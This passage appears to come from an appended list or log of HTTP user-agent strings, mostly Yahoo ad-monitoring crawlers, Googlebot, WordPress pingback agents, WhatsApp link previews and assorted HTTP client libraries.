tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614834462-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614834464-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614848399-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614848412-0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:85.0) adbeat.com/policy Gecko/20100101 Firefox/85.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614889318-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614896356-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614896356-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614896355-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614896355-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614896356-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614847883-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614847881-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.8.806 (SpeedMode; Proxy; Android 7.1.2; Redmi_4X ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614903560-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614909066-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 +WhatsApp/2.21.5.9 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614982387-0 +WordPress/5.4.4; https://sospermisdeconduire.ch +WordPress/5.6.2; https://katherineheiglcollection.com +WordPress/5.6.2; http://wildfire.asia +WordPress/5.6.2; https://eurolearnit.org +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614969112-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614905330-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614910701-0 +WordPress/5.6.2; https://irrin.web.id +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614917582-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614917569-0 +WhatsApp/2.21.4.23 A +WordPress/5.6.2; https://kompiu-pomosch.com +WordPress.com; https://kompiu-pomosch.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614968098-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614981370-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614988014-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614982254-0 +WebCopier_for_Mac/6.0 Java/11.0.8 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614982254-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614982253-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614982260-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614993680-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614994516-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615068035-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614991566-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614992854-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614995532-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1614995533-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1614998121-0 +WhatsApp/2.2106.12 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615015987-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Mobile Safari/537.36 PTST/210303.183735 +WhatsApp/2.21.5.10 A +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 PTST/210303.183735 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.208 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +WordPress/5.6.2; https://remont-39.ru +Java/11 +DDD +mWebView.getSettings().setUserAgentString(\x22Mozilla/5.0 (Amiga; U; AmigaOS 1.3; en; rv:1.8.1.19); +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.152 Safari/537.36 +UCWEB/2.0 (Java; U; MIDP-2.0; ru; NokiaE71-1Opera/9.80 (J2ME/MIDP; Opera Mini/8.0.35626/19.886; U; ru) UCBrowser/9.5.0.449 U2/1.0.0 Mobile UNTRUSTED/1.0 +yacybot (/global; amd64 Linux 4.19.0-9-amd64; java 11.0.9.1; Europe/en) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615132840-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615146710-0 +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/88.0.4324.208Safari/537.36 + + + + + + +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Mobile Safari/537.36 PTST/210304.153312 +Python/3.7 aiohttp/3.7.4.post0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615163402-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615169868-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615226677-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615229973-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615201048-0 +WhatsApp/2.2106.15 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615211310-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615211281-0 +WhatsApp/2.21.3.20 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615238487-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615240865-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.86 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.6.2; https://www.expobizitsolutions.com +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 PTST/210304.153312 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/89.0.4389.84 Mobile Safari/537.36 +Jakarta Commons-HttpClient/3.0-rc2 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1615244370-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615224724-0 +Google browser +Google/Pixel 5 (Linux;Android 11) +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) adbeat.com/policy Gecko/20100101 Firefox/86.0 +WordPress/5.6.2; https://bitlab.com.br/bitwiki +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615300231-0 +WhatsApp/2.21.41.2 i +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615250334-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615256374-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615292244-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615295806-10 +Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:85.0) adbeat.com/policy Gecko/20100101 Firefox/85.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615314851-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615252677-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615258226-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615259247-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615275181-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615278067-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615293772-0 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/89.0.4389.84 Safari/537.36 +WhatsApp/2.21.6.1 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615296979-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615317119-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615322154-0 +WordPress/5.6.2; https://petsjoke.ru +Mozilla/5.0 (compatible; kb.dk_bot; heritrix/3.4.0 +https://www.kb.dk/netarkivindsamling/) Firefox/57 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615268121-0 +python-requests/2.5.1 CPython/2.7.10 Linux/3.2.0-4-amd64 +okhttp/4.4.0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.87 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WhatsApp/2.2106.16 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615387671-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615387673-10 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 PTST/210309.192547 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1615352381-20 +WordPress/5.6.2; https://www.youtubeturkiye.net; verifying pingback from 2.56.101.166 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Mobile Safari/537.36 PTST/210309.192547 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615382241-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615343293-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615352488-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615373287-0 +Microsoft-CryptoAPI/6.3 +WhatsApp/2.21.6.2 A +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.88 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.7; https://chiptuninger.com +WordPress/5.7; https://petsjoke.ru +WordPress/3.7.5; http://smoothnenstatte.unblog.fr +Apache-HttpClient/4.5.10 (Java/15.0.2) +WordPress/5.7; https://bitlab.com.br/bitwiki +WordPress/5.5.3; https://www.pokemongo514.com +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.68 +WhatsApp/2.21.6.3 A +AppEngine-Google; (+http://code.google.com/appengine; appid: None) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615490115-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615493787-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615424870-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615453233-0 +Mechanize/2.7.6 Ruby/2.6.6p146 (http://github.com/sparklemotion/mechanize/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615476442-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615484595-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Microsoft-WebDAV-MiniRedir/10.0.19043 +WordPress/5.7; https://stroynietela.ru +WordPress/5.7; https://rusrappers.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615445257-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615445256-0 +libwww-perl/6.53 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) adbeat.com/policy Gecko/20100101 Firefox/85.0 +WordPress/5.7; https://onlinetoolweb.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615519010-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615519008-10 +WhatsApp/2.2108.8 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615589427-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615589462-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615508616-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615513206-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615517260-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615517265-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615522619-0 +lua-resty-http/0.10 (Lua) ngx_lua/10019 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615582349-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615582348-0 +WhatsApp/2.21.6.4 A +WordPress/5.7; http://www.igf-abc.info +WordPress/3.7.5; http://presuvvebound.unblog.fr +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 PTST/210309.192547 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36 PTST/210309.192547 +Apache-HttpClient/UNAVAILABLE (Java/1.8.0_282) +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.91 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (X11; Linux x86_64; rv:86.0) adbeat.com/policy Gecko/20100101 Firefox/86.0 +WordPress/4.9.16; http://ebalovo-porno.info; verifying pingback from 54.194.76.98 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615670933-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615676838-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615608115-0 +Microsoft URL Control - 6.01.9839 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615615913-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615634368-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615636218-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615665931-0 +WordPress/3.7.5; http://sfounfulwoodcbald.unblog.fr +Googleauth/1.4 j2corelte M1AJB);gzip,gzip +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.92 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +DMCA.com Page Protection Crawling Service +WhatsApp/2.21.6.5 A +WordPress/5.4.2; https://thigiacmaytinh.com +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.93 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.7; https://vondelpark.cloudaccess.host +Apache-HttpClient/4.5.10 (Java/11.0.7) +GuzzleHttp/6.5.5 curl/7.64.0 PHP/7.4.16 +Snapchat/10.75.5.0 (DUB-LX1; Android 8.1.0#158(C432)#27; gzip) V/MUSHROOM +Snapchat/10.75.5.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615781153-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615777501-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615789243-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 